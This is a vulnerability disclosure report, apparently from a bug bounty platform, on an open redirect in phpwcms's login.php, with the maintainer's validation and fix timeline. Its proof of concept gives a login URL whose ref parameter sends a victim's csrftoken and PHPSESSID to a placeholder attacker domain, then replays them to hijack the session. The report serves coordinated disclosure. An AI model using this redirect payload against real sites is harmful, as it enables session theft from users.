Open Redirect in slackero/phpwcms

Valid

Reported on

Aug 12th 2021


✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce
1. Go to http://your-domain.tld/login.php?ref=http://attackers-domain.tld/?
2. Login to a valid account
3. You will be redirected to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy

💥 Impact

This vulnerability allows an attacker to steal csrftoken and PHPSESSID.

When the attacker goes to http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, the valid user's session will be hijacked.

📍 Location login.php#L81 login.php#L243

bAu modified their report
4 months ago
bAu modified their report
4 months ago
bAu modified their report
4 months ago
bAu modified their report
4 months ago
bAu modified their report
4 months ago
We have contacted a member of the slackero/phpwcms team and are waiting to hear back 4 months ago
slackero/phpwcms maintainer validated this vulnerability 4 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
slackero/phpwcms maintainer confirmed that a fix has been merged on 45171f 4 months ago
The fix bounty has been dropped